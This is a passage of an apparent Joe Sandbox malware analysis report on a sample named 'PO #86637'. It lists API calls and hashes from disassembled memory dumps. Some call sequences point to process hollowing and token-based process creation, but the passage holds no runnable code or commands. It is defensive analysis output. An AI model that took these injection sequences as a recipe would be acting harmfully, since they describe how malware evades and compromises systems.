                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                      • _strcat.LIBCMT ref: 0040F786
                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                      • String ID:
                      • API String ID: 3199840319-0
                      • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                      • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                      APIs
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FreeInfoLibraryParametersSystem
                      • String ID:
                      • API String ID: 3403648963-0
                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                      APIs
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                      APIs
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      • __lock_file.LIBCMT ref: 00414A8D
                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                      • __fclose_nolock.LIBCMT ref: 00414A98
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                      APIs
                      • __lock_file.LIBCMT ref: 00415012
                      • __ftell_nolock.LIBCMT ref: 0041501F
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2999321469-0
                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 040D0AB3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D0B49
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D0B6B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                      • Instruction ID: 6e0fd323aef42ba5a126c803cde729b53897e17b81a7e9ae2251e219c9b944da
                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                      • Instruction Fuzzy Hash: 9712EE20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F85CF5A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __lock_file
                      • String ID:
                      • API String ID: 3031932315-0
                      APIs
                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      APIs
                      • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 040D1309
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      APIs
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                      • GetKeyState.USER32(00000011), ref: 0047C92D
                      • GetKeyState.USER32(00000009), ref: 0047C936
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                      • GetKeyState.USER32(00000010), ref: 0047C953
                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                      • _wcsncpy.LIBCMT ref: 0047CA29
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                      • SendMessageW.USER32 ref: 0047CA7F
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                      • ImageList_SetDragCursorImage.COMCTL32(009D0880,00000000,00000000,00000000), ref: 0047CB9B
                      • ImageList_BeginDrag.COMCTL32(009D0880,00000000,000000F8,000000F0), ref: 0047CBAC
                      • SetCapture.USER32(?), ref: 0047CBB6
                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                      • ReleaseCapture.USER32 ref: 0047CC3A
                      • GetCursorPos.USER32(?), ref: 0047CC72
                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                      • SendMessageW.USER32 ref: 0047CD12
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                      • SendMessageW.USER32 ref: 0047CD80
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                      • GetCursorPos.USER32(?), ref: 0047CDC8
                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                      • GetParent.USER32(00000000), ref: 0047CDF7
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                      • SendMessageW.USER32 ref: 0047CE93
                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,02EE1BC8,00000000,?,?,?,?), ref: 0047CF1C
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                      • SendMessageW.USER32 ref: 0047CF6B
                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,02EE1BC8,00000000,?,?,?,?), ref: 0047CFE6
                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 3100379633-4164748364
                      APIs
                      • GetForegroundWindow.USER32 ref: 00434420
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                      • IsIconic.USER32(?), ref: 0043444F
                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                      • SetForegroundWindow.USER32(?), ref: 0043446A
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 2889586943-2988720461
                      APIs
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                      • CloseHandle.KERNEL32(?), ref: 004463A0
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                      • GetProcessWindowStation.USER32 ref: 004463D1
                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                      • _wcslen.LIBCMT ref: 00446498
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _wcsncpy.LIBCMT ref: 004464C0
                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                      • CloseDesktop.USER32(?), ref: 0044657A
                      • SetProcessWindowStation.USER32(?), ref: 00446588
                      • CloseHandle.KERNEL32(?), ref: 00446592
                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                      • String ID: $@OH$default$winsta0
                      • API String ID: 3324942560-3791954436
                      APIs
                      • _wcslen.LIBCMT ref: 004096C1
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _memmove.LIBCMT ref: 0040970C
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                      • _memmove.LIBCMT ref: 00409D96
                      • _memmove.LIBCMT ref: 0040A6C4
                      • _memmove.LIBCMT ref: 004297E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                      • String ID:
